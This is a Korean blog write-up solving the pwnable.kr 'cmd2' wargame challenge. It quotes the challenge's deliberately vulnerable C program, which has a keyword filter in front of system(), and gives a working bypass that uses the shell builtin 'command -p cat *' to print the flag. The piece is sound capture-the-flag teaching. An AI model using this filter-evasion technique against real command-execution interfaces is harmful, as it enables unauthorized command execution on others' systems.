해설
Daddy bought me a system command shell.
but he put some filters to prevent me from playing with it without his permission...
but I wanna play anytime I want!
cmd1과 비슷한 문제이다. cmd2.c의 코드는 다음과 같다.
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_becom_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}코드를 보면 cmd1과 비슷하게 filter 함수가 있고, 프로그램의 환경변수를 다 지워버리는 delete_env 함수가 있다. 따라서 cmd2는 cmd1과 다르게 PATH 변수 뿐만 아니라 환경변수가 아예 다 날라간 상태로 프로그램이 실행된다.
이 문제는 여러가지 방법으로 풀 수 있는데, subshell이라는 개념을 이용해 풀 수도 있고, shell builtin command를 이용해 풀 수도있다. 내가 푼 방법은 shell builtin command를 이용한 것이다.
shell builtin command는 이름 그대로 쉘 자체에 내장된 커맨드로, 환경변수 없이 그냥 실행할 수 있는 커맨드들을 말한다. 빌트인 커맨드중에 command라는 커맨드가 있는데, command -p <명령어>는 PATH 환경변수를 미리 정의된 디폴트 값으로 사용하여 명령어를 수행하는 커맨드이다. 따라서 cmd2에서 아무리 환경변수를 지워도 ./cmd2 "command -p cat *"를 통해 flag를 출력할 수 있다.
'pwn' 카테고리의 다른 글
| pwnable.kr - memcpy (0) | 2020.07.21 |
|---|---|
| pwnable.kr - uaf (0) | 2020.07.21 |
| pwnable.kr - cmd1 (0) | 2020.07.16 |
| pwnable.kr - lotto (0) | 2020.07.16 |
| pwnable.kr - blackjack (0) | 2020.07.16 |